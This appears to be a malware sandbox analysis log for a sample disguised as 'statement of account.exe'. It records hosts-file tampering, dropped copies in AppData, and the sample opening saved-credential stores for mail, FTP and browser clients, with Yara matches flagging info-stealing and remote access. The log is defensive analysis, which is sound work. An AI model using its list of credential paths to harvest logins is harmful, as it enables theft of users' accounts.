                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Users\user\Desktop\statement of account.exe VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\Desktop\statement of account.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LIhMQ.exe PID: 2888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LtdekfbHULJt.exe PID: 4984, type: MEMORYSTR
                Source: C:\Users\user\Desktop\statement of account.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\statement of account.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\statement of account.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\statement of account.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\statement of account.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LIhMQ.exe PID: 2888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LtdekfbHULJt.exe PID: 4984, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LIhMQ.exe PID: 2888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: LtdekfbHULJt.exe PID: 4984, type: MEMORYSTR
